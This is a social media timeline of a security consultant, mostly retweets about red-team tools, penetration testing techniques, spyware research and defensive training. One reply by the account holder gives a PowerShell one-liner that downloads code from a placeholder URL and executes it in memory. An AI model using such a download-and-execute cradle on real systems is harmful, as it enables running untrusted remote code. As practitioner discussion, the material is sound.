James Hovious
Consultant at Mandiant
3,574 Tweets
454 Following
317 Followers
Tweets
James Hovious retweeted
n00py 3 h
I had some fun exploiting LDAP this week. I'm far from an LDAP expert, so please, bear with me as I try to make some sense of how I went from what seemed to be near complete lockdown to owning the domain.
James Hovious retweeted
く̱͕̘͚ず̡̭̠ 6 h
It was my pleasure to work on this with and , two excellent analysts. Malware analysis provided by the awesome .
James Hovious retweeted
Ryan Hausknecht Feb 3
I made a PowerShell script when researching COM objects that has like 30 foreach and if loops and will search every COM object method for a keyword, e.g. finding COM objects with a method containing 'ExecuteShell'. Maybe someone else will find it useful.
James Hovious retweeted
Marcello Feb 3
Really glad to finally get a blogpost out about this. Hopefully this is useful and gives Red Teamers ideas on how to use the BYOI concept in their own payloads. If anyone is interested in a few more follow up posts about this will gladly oblige :)
James Hovious retweeted
Marcello Feb 1
For anyone wondering, yes it’s written in C# and yes I will be totally adding it as a SILENTTRINITY module if I can get the source code (a few changes need to be made in order for it to run in memory).
James Hovious retweeted
PuddlePirate Jan 30
Wow, long time coming Happy for the result, still not happy with how it was handled by authorities. And the winner in all this? Attorneys
James Hovious retweeted
invictus Jan 30
On successful compromise of the user endpoint, the red team deployed their ultimate weapon
James Hovious retweeted
profdeibert Jan 28
Our new report out now: "Stopping the Press: Journalist Targeted by Saudi-linked Pegasus Spyware Operator".
James Hovious Jan 29
Replying to @gynvael
I think IEX (IWR "<URL>") is the shortest I know of (PSv3). If you can host something like PowerCat locally
James Hovious retweeted
ʎppɐɯɔ Jan 29
We have just pushed some *big* updates to Ghostwriter's master branch that I think you'll like. We've got WYSIWYG editors, autocomplete, new reports, and more! Check it out:
James Hovious retweeted
Sean Wright Jan 28
New tool to play with 😀 For those who may not be aware, there is a new Nessus licence called Nessus Essentials, which is a free copy of Nessus!
James Hovious retweeted
Red Canary Jan 28
From the folks that brought you Atomic Red Team, Chain Reactor is a new open source framework for composing executables that simulate adversary behaviors and techniques on Linux endpoints.
James Hovious retweeted
Steven Jan 27
Move Faster, Stay Longer blog about extending CS and tools to go with it.
James Hovious retweeted
Matthew Seyer Jan 27
The event, usn, and mft listeners are now all in one spot and better than ever! Get them all here:
James Hovious retweeted
ippsec Jan 24
Starting to put together a Linux Privesc Video. Can anyone spot something non-network that I'm missing? - Recon (linPEAS/LinEnum) - Sudo - Permission Overview (file writes - sshKey/cron) - SetUID - Kernel - Cron - Network [mysql, postgres, erlang cookie (couchDb)]
James Hovious retweeted
Mandiant Jan 23
If you've completed our Endpoint Security Deployment course, expand your knowledge and skills by learning the fundamentals of live analysis forensics and investigation for . >> Sign up:
James Hovious retweeted
Scott Cutler Jan 23
I wrote a secret scanner tool and published it under my employer's GitHub org. Since I don't have much Twitter reach I appreciate any RTs! It currently will scrape Git, S3, and GDocs for secrets, and is written in Rust for high performance.
James Hovious retweeted
SpecterOps Jan 22
New from - Revisiting Remote Desktop Lateral Movement This post discusses RDP lateral movement by leveraging mstscax.dll. Steven also is releasing SharpRDP with corresponding detection guidance for this attack technique. Post:
James Hovious retweeted
Joe Vest Jan 22
Everyone likes free training. Right? The Adversary Tactics: Powershell course has been retired from SpecterOps delivery. The course material has been made public.
James Hovious retweeted
SpecterOps Jan 22
Despite its incredible security enhancements, PowerShell continues to be abused by adversaries. A strong knowledge of PowerShell enables defenders to effectively manage and respond to its abuse. (1/4)